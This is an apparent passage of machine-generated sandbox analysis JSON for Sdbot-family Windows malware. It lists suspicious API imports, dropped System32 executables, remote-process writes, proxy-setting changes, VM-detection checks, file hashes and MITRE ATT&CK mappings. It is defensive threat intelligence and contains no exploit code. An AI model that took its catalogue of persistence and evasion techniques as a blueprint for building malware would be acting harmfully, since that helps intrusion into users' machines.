1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" claimed CRC 325214 while the actual is CRC 844368\n \"dllconf.exe\" claimed CRC 325214 while the actual is CRC 854908\n \"dllconf.exe\" claimed CRC 325214 while the actual is CRC 838920", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" has an entrypoint in section \"UPX0\"\n \"dllconf.exe\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegDeleteKeyA\n RegCloseKey\n OpenProcessToken\n GetUserNameA\n RegOpenKeyExA\n RegDeleteValueA\n RegCreateKeyExA\n LoadLibraryA\n GetFileAttributesA\n CopyFileA\n GetVersionExA\n GetModuleFileNameA\n GetSystemDirectoryA\n GetFileSize\n OpenProcess\n DeleteFileA\n UnhandledExceptionFilter\n TerminateProcess\n GetCommandLineA\n GetProcAddress\n GetTempPathA\n CreateThread\n GetModuleHandleA\n FindFirstFileA\n GetStartupInfoA\n GetComputerNameA\n FindNextFileA\n ExitThread\n CreateProcessA\n WriteFile\n Sleep\n CreateFileA\n GetTickCount\n VirtualAlloc\n ShellExecuteA\n GetClipboardData\n HttpSendRequestA\n InternetOpenUrlA\n InternetReadFile\n InternetCloseHandle\n InternetOpenA\n InternetConnectA\n InternetCrackUrlA\n WSASocketA\n accept\n WSAStartup\n connect\n closesocket\n send\n listen\n recv\n socket\n bind\n sendto", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"dllconf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\dllconf.exe]- [targetUID: 00000000-00005056]\n \"dllconf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\dllconf.exe]- [targetUID: 00000000-00005056]\n \"DLLCONF.EXE.67A9C384.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" has section name UPX0 with entropy \"6.33637327379\"\n \"dllconf.exe\" has section name UPX0 with entropy \"6.33637327379\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"Netstat error: Unable to create batch file\" (Indicator: \"netstat\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Ping timeout\" (Indicator: \"ping\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"No route to host\" (Indicator: \"route\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Netstat error: No results found\" (Indicator: \"netstat\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Netstat error: Unable to open netstat piped file\" (Indicator: \"netstat\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Netstat error: Unable to execute batch file\" (Indicator: \"netstat\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Netstat error: Unable to copy netstat\" (Indicator: \"netstat\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"netstat\" (Indicator: \"netstat\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"ping 0, GenuineIntel\" (Indicator: \"ping\"; Source: \"00000000-00005068.00000000.140099.00270000.00000004.mdmp\")\n Found string \"Netstat error: Unable to create batch file\" (Indicator: \"netstat\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found string \"Ping timeout\" (Indicator: \"ping\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found string \"No route to host\" (Indicator: \"route\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found string \"Netstat error: No results found\" (Indicator: \"netstat\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found string \"Netstat error: Unable to open netstat piped file\" (Indicator: \"netstat\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found string \"Netstat error: Unable to execute batch file\" (Indicator: \"netstat\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found string \"Netstat error: Unable to copy netstat\" (Indicator: \"netstat\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found string \"netstat\" (Indicator: \"netstat\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found string \"PING\" (Indicator: \"ping\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-93", "type": 2, "relevance": 5, "name": "Found browser information locations related strings", "description": "\"Software\\Microsoft\\Internet Explorer\\TypedURLs\" (Indicator: \"microsoft\\internet explorer\\typedurls\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"dllconf.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005068)\n \"dllconf.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2585.bat\" \"\" (UID: 00000000-00005268)\n Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2908.bat\" \"\" (UID: 00000000-00005644)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")\n \"dllconf.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"dllconf.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"dllconf.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\r2585.bat (UID: 00000000-00005056)\n \"dllconf.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\r2908.bat (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (UID: 00000000-00005056)\n Spawned process \"dllconf.exe\" with commandline \"\\\\dllconf.exe\" (UID: 00000000-00005068)\n Spawned process \"dllconf.exe\" (UID: 00000000-00005392)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2585.bat\" \"\" (UID: 00000000-00005268)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2908.bat\" \"\" (UID: 00000000-00005644)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" wrote 32 bytes to a remote process \"C:\\dllconf.exe\" (Handle: 468)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" wrote 52 bytes to a remote process \"C:\\dllconf.exe\" (Handle: 468)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" wrote 4 bytes to a remote process \"C:\\dllconf.exe\" (Handle: 468)\n \"dllconf.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\dllconf.exe\" (Handle: 472)\n \"dllconf.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\dllconf.exe\" (Handle: 472)\n \"dllconf.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\dllconf.exe\" (Handle: 472)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-7", "type": 8, "relevance": 7, "name": "Drops executable files to the Windows system directory", "description": "File type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\" was dropped at \"%WINDIR%\\System32\\dllconf.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "registry-56", "type": 3, "relevance": 5, "name": "Reads the registry for VMWare specific artifacts", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")\n \"dllconf.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "string-43", "type": 2, "relevance": 7, "name": "References security related windows services", "description": "\"wuauserv\" (Indicator: \"wuauserv\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" (Indicator: \"wscsvc\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33", "origin": "File/Memory", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16
https://hybrid-analysis.com/sample/0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16
Hybrid Analysis - Killers
{"size": 668449, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16", "sha256": "0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16", "av_detect": 87, "vx_family": "Sdbot.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 205, "extracted_files": [{"name": "r2767.bat", "file_path": "%TEMP%\\r2767.bat", "file_size": 238, "sha256": "90ab11916f6fcc840946113e44d7a592a2beab874abd2d0ffdfc73e1887636e6", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with CRLF line terminators", "runtime_process": "0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe (PID: 4816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dlldsk32.exe", "file_path": "%WINDIR%\\System32\\dlldsk32.exe", "file_size": 682818, "sha256": "e7688ad81d1d59b045a37cf0102eae23cc2381c16fca3703c46d8f3049819531", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe (PID: 4816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DLLDSK32.EXE.67A9C384.bin", "file_size": 682818, "sha256": "e7688ad81d1d59b045a37cf0102eae23cc2381c16fca3703c46d8f3049819531", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004816", "name": "0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe", "normalized_path": "C:\\0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe", "sha256": "0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16"}, {"uid": "00000000-00005072", "parentuid": "00000000-00004816", "name": "dlldsk32.exe", "normalized_path": "%WINDIR%\\system32\\dlldsk32.exe", "sha256": "e7688ad81d1d59b045a37cf0102eae23cc2381c16fca3703c46d8f3049819531"}, {"uid": "00000000-00005084", "parentuid": "00000000-00004816", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\r2767.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 2, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Clear Windows Event Logs", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 4, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", 